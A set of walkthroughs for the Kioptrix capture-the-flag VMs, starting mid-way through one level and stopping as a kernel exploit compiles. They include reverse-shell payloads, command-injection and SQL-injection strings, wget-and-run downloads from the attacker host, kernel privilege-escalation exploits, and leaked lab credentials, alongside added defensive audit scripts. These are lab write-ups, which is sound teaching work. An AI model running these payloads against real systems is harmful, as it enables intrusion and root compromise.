The exploit asks you to set a password for the new user. Now try to get a root shell
 bash-3.2$ su firefart
 Password:
 Failed to add entry for user firefart.
 
 firefart@Kioptrix4:/home/john# whoami
 firefart
 firefart@Kioptrix4:/home/john# cd /root
 firefart@Kioptrix4:~# ls
 congrats.txt  lshell-0.9.12
 firefart@Kioptrix4:~# cat congrats.txt
 Congratulations!
 You've got root.
 
 There is more then one way to get root on this system. Try and find them.
 I've only tested two (2) methods, but it doesn't mean there aren't more.
 As always there's an easy way, and a not so easy way to pop this box.
 Look for other methods to get root privileges other than running an exploit.
 
 It took a while to make this. For one it's not as easy as it may look, and
 also work and family life are my priorities. Hobbies are low on my list.
 Really hope you enjoyed this one.
 
 If you haven't already, check out the other VMs available on:
 www.kioptrix.com
 
 Thanks for playing,
 loneferret
 
 firefart@Kioptrix4:~#
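As an added detection example (not from the original walkthrough), the check a defender would run for the outcome of Method 2: the exploit appends a second UID-0 entry, `firefart`, to /etc/passwd, so any UID-0 account other than root, or more than one UID-0 entry, is a strong indicator of compromise. The passwd content below is constructed sample data; its firefart line is the one printed by the exploit above, and the other lines are made up to resemble the box.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: audit a passwd-format
# file for UID-0 accounts other than root.

# Print "name:uid:shell" for every UID-0 entry in a passwd-format file ($1).
uid0_accounts() {
  awk -F: '$3 == 0 { print $1 ":" $3 ":" $7 }' "$1"
}

# Print the names of UID-0 accounts other than root; return 1 if any exist.
extra_uid0_accounts() {
  extra="$(awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1")"
  if [ -n "$extra" ]; then
    printf '%s\n' "$extra"
    return 1
  fi
  return 0
}

# Constructed sample passwd file mirroring the post-exploit state on the box.
# Only the firefart line is taken from the exploit output above.
sample_passwd() {
  f="$(mktemp)"
  cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
EOF
  printf '%s' "$f"
}

# Live use: extra_uid0_accounts /etc/passwd  (non-zero exit => added UID-0 account)
```

Run `extra_uid0_accounts /etc/passwd` from cron or a configuration-management check; a non-zero exit with names on stdout means a UID-0 account has been added. The exploit also leaves its backup at /tmp/passwd.bak, which is worth alerting on as well.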

Some useful privilege escalation resources : 

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://payatu.com/guide-linux-privilege-escalation
https://gtfobins.github.io/
https://www.prodefence.org/beroot-for-linux-privilege-escalation-project/
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

Kioptrix: Level 1.2 (#3) CTF VM WalkThrough

VM :  Kioptrix: Level 1.2 (#3)

Download Link :  https://download.vulnhub.com/kioptrix/KVM3.rar

VM HOST : VMware Workstation/Player
Network : Bridged mode with DHCP

Nmap Scan :
 $ nmap -A 192.168.1.5 -oN nmap.scan
 
 # Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan 192.168.1.5
 Nmap scan report for 192.168.1.5
 Host is up (0.00050s latency).
 Not shown: 998 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
 | ssh-hostkey:
 |   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
 |_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
 80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 |_http-title: Ligoat Security - Got Goat? Security ...
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.8 - 2.6.30
 Network Distance: 2 hops
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 TRACEROUTE (using port 21/tcp)
 HOP RTT     ADDRESS
 1   0.04 ms 172.17.0.1
 2   0.41 ms 192.168.1.5
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds
Findings :
* The apache web server is running on port 80.
* SSH is running on port 22.

Checking the web app
 $ python urlCroll.py http://kioptrix3.com/
 
 http://kioptrix3.com/index.php?page=index
 http://kioptrix3.com/index.php?system=Blog
 http://kioptrix3.com/index.php?system=Admin
 http://kioptrix3.com//gallery

Link : urlCroll.py

http://kioptrix3.com/index.php?page=index


http://kioptrix3.com/index.php?system=Admin


http://kioptrix3.com/index.php?system=Blog


Also note that the web app is using LotusCMS.

There is also a gallery app, but to access all of its content, map the IP address of the VM to kioptrix3.com by adding it to the /etc/hosts file (the redirection has to run as root, so use tee rather than `sudo echo`)
 $ echo '192.168.1.5     kioptrix3.com' | sudo tee -a /etc/hosts
The URL of the gallery app is :
 http://kioptrix3.com/gallery

Scanning Web Application : 
nikto scan output
 $ nikto -host kioptrix3.com
 
 - Nikto v2.1.5
 ---------------------------------------------------------------------------
 + Target IP:          192.168.1.5
 + Target Hostname:    kioptrix3.com
 + Target Port:        80
 + Start Time:         2020-04-20 18:46:19 (GMT5.5)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
 + The anti-clickjacking X-Frame-Options header is not present.
 + Cookie PHPSESSID created without the httponly flag
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
 + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
 + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
 + OSVDB-3268: /icons/: Directory indexing found.
 + Cookie phpMyAdmin created without the httponly flag
 + OSVDB-3233: /icons/README: Apache default file found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
 + End Time:           2020-04-20 18:46:28 (GMT5.5) (9 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
A phpmyadmin directory is found.

Similar results from dirb :
 $ dirb http://kioptrix3.com | tee dirb.scan
 
 ==> DIRECTORY: http://192.168.1.5/cache/
 + http://192.168.1.5/favicon.ico (CODE:200|SIZE:23126)
 + http://192.168.1.5/index.php (CODE:200|SIZE:1819)
 + http://192.168.1.5/cache/index.html (CODE:200|SIZE:1819)
 ==> DIRECTORY: http://192.168.1.5/core/controller/
 + http://192.168.1.5/core/index.php (CODE:200|SIZE:0)
 + http://192.168.1.5/gallery/index.php (CODE:500|SIZE:5650)
 + http://192.168.1.5/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
 + http://192.168.1.5/phpmyadmin/index.php (CODE:200|SIZE:8136)
 + http://192.168.1.5/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
 + http://192.168.1.5/style/admin.php (CODE:200|SIZE:356)
 + http://192.168.1.5/style/index.php (CODE:200|SIZE:0)
 + http://192.168.1.5/core/controller/index.php (CODE:200|SIZE:0)
 + http://192.168.1.5/core/lib/index.php (CODE:200|SIZE:0)
 + http://192.168.1.5/core/model/index.php (CODE:200|SIZE:0)
 + http://192.168.1.5/core/view/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/favicon.ico (CODE:200|SIZE:23126)
 + http://kioptrix3.com/index.php (CODE:200|SIZE:1819)
 + http://kioptrix3.com/cache/index.html (CODE:200|SIZE:1819)
 + http://kioptrix3.com/core/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
 + http://kioptrix3.com/phpmyadmin/index.php (CODE:200|SIZE:8136)
 + http://kioptrix3.com/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/style/admin.php (CODE:200|SIZE:356)
 + http://kioptrix3.com/style/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/controller/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/lib/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/model/index.php (CODE:200|SIZE:0)
 + http://kioptrix3.com/core/view/index.php (CODE:200|SIZE:0)
And also the scan results from dirsearch :
 $ ./dirsearch.py -u http://kioptrix3.com -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
 
 $ cat dirsearchReport | grep 200
 
 200     2KB  http://kioptrix3.com/cache/
 200   688B   http://kioptrix3.com/core/fragments/moduleInfo.phtml
 200    23KB  http://kioptrix3.com/favicon.ico
 200     2KB  http://kioptrix3.com/index.php
 200     2KB  http://kioptrix3.com/index.php/login/
 200   146B   http://kioptrix3.com/modules/TinyMCE/TinyMCEModuleInfo.php
 200     8KB  http://kioptrix3.com/phpmyadmin/
We can access phpMyAdmin with the default user `admin` and a blank password, but only the information_schema database is accessible with these default credentials.

Exploiting LotusCMS :

A quick search for LotusCMS vulnerabilities shows that version 3.0 is vulnerable to RCE.

Link :  https://github.com/Hood3dRob1n/LotusCMS-Exploit

To exploit this, start a listener on the attack machine and run the exploit script :
 $ wget https://github.com/Hood3dRob1n/LotusCMS-Exploit/raw/master/lotusRCE.sh
 $ chmod +x lotusRCE.sh
 $ ./lotusRCE.sh kioptrix3.com /
 
 Path found, now to check for vuln....
 
 </html>Hood3dRob1n
 Regex found, site is vulnerable to PHP Code Injection!
 
 About to try and inject reverse shell....
 what IP to use?
 192.168.1.3      <----- IP address of local machine
 What PORT?
 1234             <---- listener port number
 
 OK, open your local listener and choose the method for back connect:
 1) NetCat -exploit    3) NetCat Backpipe    5) Exit
 2) NetCat /dev/tcp    4) NetCat FIFO
 #? 1
And we get the reverse connection :
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from kioptrix3.com 37530 received!
 whoami
 www-data
Getting a tty shell :
 python -c 'import pty;pty.spawn("/bin/sh")'
 $

Enumerating files :
Looking at the web directory :
 $ pwd
 pwd
 /home/www/kioptrix3.com
 $ ls
 cache  data    gallery  index.php  style
 core   favicon.ico  gnu-lgpl.txt  modules    update.php
 
 $ cd gallery
 
 $ ls
 BACK     gfooter.php     logout.php        readme.html    tags.php
 db.sql     gfunctions.php  p.php       recent.php     themes
 g.php     gheader.php     photos       register.php   version.txt
 gadmin     index.php     photos.php        scopbin      vote.php
 gallery.php  install.BAK     post_comment.php  search.php
 gconfig.php  login.php     profile.php       slideshow.php
 
 $ cat gconfig.php
 <?php
     error_reporting(0);
     /*
         A sample Gallarific configuration file. You should edit
         the installer details below and save this file as gconfig.php
         Do not modify anything else if you don't know what it is.
     */
 
     // Installer Details -----------------------------------------------
 
     // Enter the full HTTP path to your Gallarific folder below,
     // such as http://www.yoursite.com/gallery
     // Do NOT include a trailing forward slash
 
     $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
     $GLOBALS["gallarific_mysql_server"] = "localhost";
     $GLOBALS["gallarific_mysql_database"] = "gallery";
     $GLOBALS["gallarific_mysql_username"] = "root";
     $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
In the gallery web directory we find the database credentials "root/fuckeyou"; with these we can successfully log in to phpMyAdmin, and in the gallery database we find two usernames with hashed passwords :
 dreg         fb887aabd50f243b3f155c0f85
 loneferret   5badcaf789d3d1d09794d8f021f40f0e
These hashes are cracked with crackstation.net :
 dreg        :  Mast3r
 loneferret  :  starwars
With the user "loneferret/starwars" we can successfully ssh into the machine :
 $ ssh loneferret@192.168.1.5
 loneferret@192.168.1.5's password:
 Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.
 
 To access official Ubuntu documentation, please visit:
 http://help.ubuntu.com/
 Last login: Mon Apr 20 04:26:57 2020 from 192.168.1.3
 loneferret@Kioptrix3:~$ whoami
 loneferret
 loneferret@Kioptrix3:~$
But with this we can't access the root directory
 loneferret@Kioptrix3:~$ cd /root
 -bash: cd: /root: Permission denied

Privilege Escalation :

Method 1 :
There is a file CompanyPolicy.README, which describes the command 'sudo ht' :
 loneferret@Kioptrix3:~$ cat CompanyPolicy.README
 Hello new employee,
 It is company policy here to use our newly installed software for editing, creating and viewing files.
 Please use the command 'sudo ht'.
 Failure to do so will result in you immediate termination.
 
 DG
 CEO
 loneferret@Kioptrix3:~$ sudo ht
 sudo: no passwd entry for root!
 
 loneferret@Kioptrix3:~$ which ht
 /usr/local/bin/ht
 
 loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
 -rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht
`ht` is a file editor/viewer/analyzer for executables. In this case it has the setuid bit set, meaning it runs with root privileges, so with it we can edit files that require root access. That means we can escalate our privileges by editing the `/etc/sudoers` file to allow the user `loneferret` to run `/bin/su`, which gives us root access.

Open the file by
 $ sudo ht /etc/sudoers
Which looks like this


To change it into text mode press `F6` and choose text mode


We have to change '!/usr/bin/su' to '/bin/su'


To edit the file, change the mode to "hex" (press F6) and press F4 to edit; now just overwrite "!/usr" in "!/usr/bin/su" with "20" (hex for space), which looks like

Before :


After :


and press F2 to save.

Now just run the command `sudo su`
 loneferret@Kioptrix3:~$ sudo su
 root@Kioptrix3:/home/loneferret# whoami
 root
That's it, we get the root shell!!
 Congrats.txt  ht-2.0.18
 root@Kioptrix3:~# cat Congrats.txt
 Good for you for getting here.
 Regardless of the matter (staying within the spirit of the game of course)
 you got here, congratulations are in order. Wasn't that bad now was it.
 
 Went in a different direction with this VM. Exploit based challenges are
 nice. Helps workout that information gathering part, but sometimes we
 need to get our hands dirty in other things as well.
 Again, these VMs are beginner and not intented for everyone.
 Difficulty is relative, keep that in mind.
 
 The object is to learn, do some research and have a little (legal)
 fun in the process.
 
 
 I hope you enjoyed this third challenge.
 
 Steven McElrea
 aka loneferret
 http://www.kioptrix.com
 
 
 Credit needs to be given to the creators of the gallery webapp and CMS used
 for the building of the Kioptrix VM3 site.
 
 Main page CMS:
 http://www.lotuscms.org
 
 Gallery application:
 Gallarific 2.1 - Free Version released October 10, 2009
 http://www.gallarific.com
 Vulnerable version of this application can be downloaded
 from the Exploit-DB website:
 http://www.exploit-db.com/exploits/15891/
 
 The HT Editor can be found here:
 http://hte.sourceforge.net/downloads.html
 And the vulnerable version on Exploit-DB here:
 http://www.exploit-db.com/exploits/17083/
 
 
 Also, all pictures were taken from Google Images, so being part of the
 public domain I used them.
 
 root@Kioptrix3:~#
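Method 1 works because a setuid editor sits in /usr/local/bin. As an added example (not code from the VM or the walkthrough), here is the defender's counterpart of `ls -al /usr/local/bin/ht`: enumerate setuid/setgid files and flag anything that is not on an allow-list, lives in a locally managed directory, is setuid to a non-root owner, or is world writable. The sample entries and the uid 1001 are constructed, not taken from the VM.

```python
"""Audit for setuid/setgid executables such as the ht binary from Method 1."""
import os
import stat
from typing import Iterable, Iterator, List, NamedTuple, Set, Tuple


class SuidEntry(NamedTuple):
    path: str
    mode: int   # full st_mode, e.g. 0o106755 renders as -rwsr-sr-x
    uid: int


def scan_setuid(root: str) -> Iterator[SuidEntry]:
    """Walk `root` and yield regular files carrying the setuid or setgid bit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield SuidEntry(path, st.st_mode, st.st_uid)


# Directories that package managers do not own; a setuid file here was put
# there by hand, exactly like /usr/local/bin/ht on the VM.
LOCAL_DIRS = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")


def reasons(entry: SuidEntry, allowlist: Set[str]) -> List[str]:
    """Return why an entry deserves a look; an empty list means it is expected."""
    out: List[str] = []
    if entry.path not in allowlist:
        out.append("not in allow-list")
    if entry.path.startswith(LOCAL_DIRS):
        out.append("locally installed, not package managed")
    if entry.uid != 0 and entry.mode & stat.S_ISUID:
        out.append(f"setuid to non-root uid {entry.uid}")
    if entry.mode & stat.S_IWOTH:
        out.append("world writable")
    return out


def audit(entries: Iterable[SuidEntry], allowlist: Set[str]) -> List[Tuple[str, str, List[str]]]:
    """Pair each suspicious entry with its ls-style mode string and the reasons."""
    findings = []
    for entry in entries:
        why = reasons(entry, allowlist)
        if why:
            findings.append((entry.path, stat.filemode(entry.mode), why))
    return findings


# Constructed sample: the ht binary from the page (mode -rwsr-sr-x, owner
# assumed to be a non-root uid 1001) next to a normal package-managed sudo.
SAMPLE = [
    SuidEntry("/usr/local/bin/ht", 0o106755, 1001),
    SuidEntry("/usr/bin/sudo", 0o104755, 0),
]
ALLOW = {"/usr/bin/sudo", "/usr/bin/passwd", "/bin/su"}

if __name__ == "__main__":
    for path, mode, why in audit(SAMPLE, ALLOW):
        print(mode, path, "->", "; ".join(why))
    # Live check of a host: audit(scan_setuid("/usr"), ALLOW)
```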

Method 2 :

We use this method within the reverse shell obtained by the LotusCMS exploit.

First check the OS and kernel version :
 $ cat /etc/issue
 Ubuntu 8.04.3 LTS \n \l
 
 $ cat /etc/*-release
 DISTRIB_ID=Ubuntu
 DISTRIB_RELEASE=8.04
 DISTRIB_CODENAME=hardy
 DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
 
 $ uname -a
 Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
 
 $ cat /proc/version
 Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
So the kernel version is 2.6.24. Searching for an exploit for Linux kernel 2.6.24, I found the following :  https://www.exploit-db.com/exploits/40839

According to its documentation the exploit creates a new user 'firefart' with root privileges. Download it and test it :
 $ cd /tmp
 
 $ wget 192.168.1.3:8000/exploit.c
 
 $ gcc -pthread exploit.c -o exploit -lcrypt
 exploit.c:193:2: warning: no newline at end of file
 
 $ ./exploit
 ./exploit
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password: 12345
 
 Complete line:
 firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash
 
 mmap: b7fe0000
 madvise 0
 
 ptrace 0
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 
 
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
The exploit seems to work; now try to log in as the new user "firefart" with password 12345 :
 $ su firefart
 Password: 12345
 
 firefart@Kioptrix3:/tmp# cd /root
 
 firefart@Kioptrix3:~# ls
 Congrats.txt  ht-2.0.18
 
 firefart@Kioptrix3:~# cat Congrats.txt
 Good for you for getting here.
 Regardless of the matter (staying within the spirit of the game of course)
We can access the /root directory.

Kioptrix: Level 1.1 (#2) CTF VM WalkThrough

VM : Kioptrix: Level 1.1  

Download Link : https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

Nmap Scan :
 # Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4
 Nmap scan report for 192.168.1.4
 Host is up (0.00042s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE    VERSION
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 | ssh-hostkey:
 |   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
 |   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
 |_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
 |_sshv1: Server supports SSHv1
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 |_http-server-header: Apache/2.0.52 (CentOS)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 |_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
 | sslv2:
 |   SSLv2 supported
 |   ciphers:
 |     SSL2_RC4_128_EXPORT40_WITH_MD5
 |     SSL2_RC4_128_WITH_MD5
 |     SSL2_DES_64_CBC_WITH_MD5
 |     SSL2_DES_192_EDE3_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
 |_    SSL2_RC4_64_WITH_MD5
 631/tcp  open  ipp        CUPS 1.1
 | http-methods:
 |_  Potentially risky methods: PUT
 |_http-server-header: CUPS/1.1
 |_http-title: 403 Forbidden
 3306/tcp open  mysql      MySQL (unauthorized)
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.9 - 2.6.27
 Network Distance: 2 hops
 
 Host script results:
 |_clock-skew: -3h09m42s
 
 TRACEROUTE (using port 256/tcp)
 HOP RTT     ADDRESS
 1   0.05 ms 172.17.0.1
 2   0.32 ms 192.168.1.4
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 seconds
Open ports are :
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 631/tcp  open  ipp        CUPS 1.1
 3306/tcp open  mysql      MySQL (unauthorized)
Port 80 is open. There is a web page :


There may be an SQL injection vulnerability. I tried to find it with sqlmap, but it did not find anything :
 $ sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"
But after trying manually with Burp Repeater, there is an SQL injection vulnerability in the `psw` field, which can be exploited by putting `' or 1='1 --+` in the password field. It then loads another page where we can ping any device within the network.


 192.168.1.10
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2002ms
 rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2
In this functionality there is a possibility of command injection; try to execute a command by appending it to the IP address :
 ip_address;command
For example
 192.168.1.10;ls
And as expected it returns the filenames in the current directory.
 192.168.1.10;ls
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
 index.php
 pingit.php
Another example :
 192.168.1.10;ls -al;pwd;whoami
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
 total 24
 drwxr-xr-x  2 root root 4096 Oct  8  2009 .
 drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
 -rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
 -rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
 /var/www/html
 apache
The user is apache, the directory is /var/www/html, and all the files are owned by root.
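The ping page above is a textbook command injection: the submitted address is pasted into a shell command line, so `;` starts a second command. As an added example (not the VM's pingit.php, which the page never shows), the first function below is an assumed reconstruction of that behaviour, followed by a triage helper for request values and the shell-free, allow-list fix.

```python
"""Why the ping form is injectable, and the allow-list fix."""
import ipaddress
import re
import subprocess
from typing import List

# Characters that let a value break out of a single shell word.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r\\'\"]")


def vulnerable_ping_command(user_input: str) -> str:
    """Command line as an injectable form builds it (assumed shape, not the VM's code).

    Handed to /bin/sh, "192.168.1.10;ls" becomes two commands: the ping, then ls.
    """
    return "ping -c 3 " + user_input


def classify_ping_input(user_input: str) -> str:
    """Triage a submitted value: 'ok', 'injection' or 'invalid'.

    'injection' means a shell metacharacter is present, which is what the
    page's ip_address;command payloads look like in a request log.
    """
    value = user_input.strip()
    if SHELL_META.search(value):
        return "injection"
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return "invalid"
    return "ok"


def safe_ping_argv(user_input: str) -> List[str]:
    """Build argv for a shell-free subprocess call.

    Only a literal IPv4/IPv6 address is accepted, so the target can never carry
    a second command; and because no shell is involved, even a stray ';' would
    reach ping as part of one argument rather than as a command separator.
    """
    value = user_input.strip()
    try:
        target = ipaddress.ip_address(value)
    except ValueError:
        raise ValueError(f"rejected ping target: {value!r}") from None
    return ["ping", "-c", "3", str(target)]


def run_safe_ping(user_input: str) -> str:
    """Execute the validated ping without a shell and return its output."""
    proc = subprocess.run(safe_ping_argv(user_input), capture_output=True,
                          text=True, check=False, timeout=15)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed samples: the page's payloads next to a legitimate value.
    for sample in ("192.168.1.10", "192.168.1.10;ls", "192.168.1.10;ls -al;pwd;whoami"):
        print(f"{sample!r:40} -> {classify_ping_input(sample)}")
```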

Getting a remote shell :

We are going to use php reverse shell from pentestmonkey.net : http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Download it from their page and change $ip and $port to your local system's :
 set_time_limit (0);
 $VERSION = "1.0";
 $ip = '192.168.1.3';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $shell = 'uname -a; w; id; /bin/sh -i';
 $daemon = 0;
 $debug = 0;
Now to upload this PHP file we use a series of commands. First start a server to host the bd.php file (I renamed the reverse shell PHP file). We can use a simple Python server :
 python -m SimpleHTTPServer 8000
Commands to upload file
 cd /tmp                               # change directory to tmp
 wget http://192.168.1.3:8000/bd.php   # download backdoor file
 php -f bd.php                         # execute file
Remember we can't download the file into the webroot directory, because it is owned by root and the ping command is executed by the user apache. Before executing the commands, first start the listener on the local machine :
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
Command :
 192.168.1.10;cd /tmp;wget http://192.168.1.3:8000/bd.php;php -f bd.php
After execution we get a reverse shell on the listener :
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from 192.168.1.4 45265 received!
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
  12:21:07 up  6:17,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=48(apache) gid=48(apache) groups=48(apache)
 sh: no job control in this shell
 sh-3.00$
 sh-3.00$ whoami
 apache
And we have the reverse shell.

Kernel Privilege Escalation :

Examining the OS and kernel version :
 sh-3.00# uname -a
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 sh-3.00# cat /etc/*-release
 CentOS release 4.5 (Final)
A Google search for "kernel 2.6 exploit" gives an exploit for kernel versions below 2.6.22, found here : https://www.exploit-db.com/exploits/9542
 $ wget https://www.exploit-db.com/raw/9542
 $ mv 9542 peroot.c
Now download it onto the Kioptrix machine and compile it :
 sh-3.00$ cd /tmp
 sh-3.00$ wget http://192.168.1.3:8000/peroot.c
 sh-3.00$ gcc peroot.c -o peroot
